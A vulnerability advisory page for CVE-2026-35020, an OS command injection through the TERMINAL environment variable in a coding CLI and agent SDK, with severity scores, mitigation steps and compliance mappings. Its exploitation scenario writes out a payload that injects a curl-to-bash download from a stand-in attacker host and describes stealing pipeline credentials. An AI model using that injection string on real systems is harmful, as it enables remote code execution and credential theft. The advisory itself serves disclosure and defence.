CVE-2026-35020: Claude Code CLI: OS command injection via TERMINAL env

HIGH PoC AVAILABLE CISA: ATTEND
Published April 6, 2026
CISO Take

CVE-2026-35020 is an OS command injection flaw (CWE-78, CVSS 8.4) in Anthropic's Claude Code CLI and Claude Agent SDK, triggered by shell metacharacters injected into the TERMINAL environment variable that are passed unsanitized to /bin/sh via shell=true execution. The blast radius is significant — Claude Code is deployed on developer workstations, AI engineering teams, and CI/CD pipelines industry-wide, and the attack requires no privileges and no user interaction once the environment variable is set. While not yet in CISA KEV and no confirmed public exploit exists, the trivially low exploitation complexity combined with the high-value credential context of AI development environments (API keys, cloud tokens, model weights) makes this a realistic lateral movement vector in any org running automated Claude Code pipelines. Teams should update Claude Code CLI and the Agent SDK to patched versions immediately, audit CI/CD pipeline variable permissions, and sanitize the TERMINAL variable in all shared build environments.

Sources: NVD ATLAS phoenix.security vulncheck.com

What is the risk?

High severity with realistic local exploitation path. CVSS 8.4 reflects high CIA impact with no privileges required — any attacker who can influence the process environment (compromised shell configuration, malicious project dotfiles, CI/CD variable injection via PR) achieves arbitrary code execution. AI development environments are premium targets: they routinely hold cloud provider credentials, Anthropic API keys, model weights, and access to production inference infrastructure. The attack surface extends beyond typical local vulns because CI/CD systems frequently run Claude Code in automated pipelines where TERMINAL can be set through pipeline-level variables, potentially accessible to untrusted contributors in open-source or multi-team repositories.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Anthropic Node npm No patch
2.0K 280 dependents Pushed 6d ago 67% patched ~3d to patch Full package profile →
Claude Code npm No patch
136.1K Pushed 5d ago 72% patched ~2d to patch Full package profile →

How severe is it?

CVSS 3.1
8.4 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 30% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Local
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

6 steps
  1. Update Claude Code CLI and Claude Agent SDK to the patched version immediately — monitor Anthropic security advisories for the fixed release.

  2. Audit all CI/CD pipelines for externally-controllable TERMINAL variable injection points; restrict pipeline variable write permissions to maintainers only.

  3. In CI/CD contexts, run Claude Code in isolated containers with explicit environment sanitization — unset or validate TERMINAL before execution.

  4. Add detection rules for shell processes spawned by Claude Code with TERMINAL values containing metacharacters (semicolons, pipe characters, backticks, $() sequences).

  5. Audit deep-link URL handlers registered by the CLI and restrict deep-link protocol handling in shared or multi-user environments.

  6. Rotate any API keys or credentials accessible from affected development environments as a precaution.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.2 - AI risk assessment
NIST AI RMF
MANAGE 2.4 - Residual risks and documented mitigations
OWASP LLM Top 10
LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-35020?

CVE-2026-35020 is an OS command injection flaw (CWE-78, CVSS 8.4) in Anthropic's Claude Code CLI and Claude Agent SDK, triggered by shell metacharacters injected into the TERMINAL environment variable that are passed unsanitized to /bin/sh via shell=true execution. The blast radius is significant — Claude Code is deployed on developer workstations, AI engineering teams, and CI/CD pipelines industry-wide, and the attack requires no privileges and no user interaction once the environment variable is set. While not yet in CISA KEV and no confirmed public exploit exists, the trivially low exploitation complexity combined with the high-value credential context of AI development environments (API keys, cloud tokens, model weights) makes this a realistic lateral movement vector in any org running automated Claude Code pipelines. Teams should update Claude Code CLI and the Agent SDK to patched versions immediately, audit CI/CD pipeline variable permissions, and sanitize the TERMINAL variable in all shared build environments.

Is CVE-2026-35020 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-35020, increasing the risk of exploitation.

How to fix CVE-2026-35020?

1. Update Claude Code CLI and Claude Agent SDK to the patched version immediately — monitor Anthropic security advisories for the fixed release. 2. Audit all CI/CD pipelines for externally-controllable TERMINAL variable injection points; restrict pipeline variable write permissions to maintainers only. 3. In CI/CD contexts, run Claude Code in isolated containers with explicit environment sanitization — unset or validate TERMINAL before execution. 4. Add detection rules for shell processes spawned by Claude Code with TERMINAL values containing metacharacters (semicolons, pipe characters, backticks, $() sequences). 5. Audit deep-link URL handlers registered by the CLI and restrict deep-link protocol handling in shared or multi-user environments. 6. Rotate any API keys or credentials accessible from affected development environments as a precaution.

What systems are affected by CVE-2026-35020?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, CI/CD pipelines, developer tooling.

What is the CVSS score for CVE-2026-35020?

CVE-2026-35020 has a CVSS v3.1 base score of 8.4 (HIGH). The EPSS exploitation probability is 0.11%.

What is the AI security impact?

Affected AI Architectures

agent frameworksCI/CD pipelinesdeveloper tooling

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.1.2
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM06:2025

What are the technical details?

Original Advisory

Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the command lookup helper and deep-link terminal launcher that allows local attackers to execute arbitrary commands by manipulating the TERMINAL environment variable. Attackers can inject shell metacharacters into the TERMINAL variable which are interpreted by /bin/sh when the command lookup helper constructs and executes shell commands with shell=true. The vulnerability can be triggered during normal CLI execution as well as via the deep-link handler path, resulting in arbitrary command execution with the privileges of the user running the CLI.

Exploitation Scenario

An attacker targeting an AI engineering team submits a PR to a project that uses Claude Code in CI/CD automation. The PR includes a malicious .envrc or project configuration file that sets TERMINAL='xterm;curl http://attacker.com/exfil.sh|bash #'. When the automated pipeline triggers Claude Code CLI — for code enrichment, agent task execution, or PR review — the command lookup helper constructs a shell invocation with shell=true, executing the injected payload. The pipeline service account credentials, Anthropic API keys, and cloud provider tokens stored in the pipeline environment are exfiltrated. Alternatively, an attacker sends a phishing email to an AI engineer with a crafted deep-link (claude://...) that triggers the deep-link handler path, achieving the same injection on the developer's local workstation without any file-system access required.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 6, 2026
Last Modified
April 29, 2026
First Seen
April 6, 2026

Related Vulnerabilities